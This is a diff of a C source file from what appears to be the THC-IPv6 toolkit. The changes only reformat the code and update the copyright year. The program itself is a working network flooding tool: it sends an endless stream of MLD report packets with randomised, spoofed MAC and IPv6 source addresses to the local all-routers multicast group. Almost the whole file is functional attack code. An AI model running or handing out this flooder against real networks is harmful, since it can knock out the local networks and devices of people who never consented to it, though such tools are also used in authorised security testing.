@@ -11,26 +11,26 @@
 #include "thc-ipv6.h"
 
 void help(char *prg) {
-  printf("%s %s (c) 2019 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("%s %s (c) 2020 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
   printf("Syntax: %s interface [target]\n\n", prg);
   printf("Flood the local network with MLD reports.\n");
-//  printf("Use -r to use raw mode.\n\n");
+  //  printf("Use -r to use raw mode.\n\n");
   exit(-1);
 }
 
 int main(int argc, char *argv[]) {
-  char *interface, mac[6] = "";
+  char *         interface, mac[6] = "";
   unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0");
-  unsigned char buf[6], buf2[16];
-  unsigned char *dst = thc_resolve6("ff02::2"), *dstmac = thc_get_multicast_mac(dst);
-  int i;
+  unsigned char  buf[6], buf2[16];
+  unsigned char *dst = thc_resolve6("ff02::2"),
+                *dstmac = thc_get_multicast_mac(dst);
+  int            i;
   unsigned char *pkt = NULL;
-  int pkt_len = 0;
-  int rawmode = 0;
-  int count = 0;
+  int            pkt_len = 0;
+  int            rawmode = 0;
+  int            count = 0;
 
-  if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
-    help(argv[0]);
+  if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]);
 
   if (strcmp(argv[1], "-r") == 0) {
     thc_ipv6_rawmode(1);
@@ -66,38 +66,39 @@ int main(int argc, char *argv[]) {
   buf2[0] = 0xff;
   buf2[1] = 0x0d;
 
-  printf("Starting to flood network with MLD reports on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
+  printf(
+      "Starting to flood network with MLD reports on %s (Press Control-C to "
+      "end, a dot is printed for every 1000 packets):\n",
+      interface);
   while (1) {
-
     for (i = 0; i < 6; i++)
       buf2[10 + i] = rand() % 256;
     for (i = 0; i < 4; i++)
       mac[2 + i] = rand() % 256;
 
-//    ip6[9] = mac[1];
+    //    ip6[9] = mac[1];
     ip6[10] = mac[2];
     ip6[13] = mac[3];
     ip6[14] = mac[4];
     ip6[15] = mac[5];
     count++;
 
-    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL)
+    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6,
+                                        dst, 1, 0, 0, 0, 0)) == NULL)
       return -1;
-    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0)
-      return -1;
-    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD_REPORT, 0, 0, buf2, sizeof(buf2), 0) < 0)
+    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0) return -1;
+    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD_REPORT, 0, 0, buf2, sizeof(buf2),
+                      0) < 0)
       return -1;
     if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
-//      fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
-//      perror("");
-//      return -1;
+      //      fprintf(stderr, "Error sending packet no. %d on interface %s: ",
+      //      count, interface); perror(""); return -1;
       printf("!");
     }
 
     pkt = thc_destroy_packet(pkt);
-//    usleep(1);
-    if (count % 1000 == 0)
-      printf(".");
+    //    usleep(1);
+    if (count % 1000 == 0) printf(".");
   }
   return 0;
 }
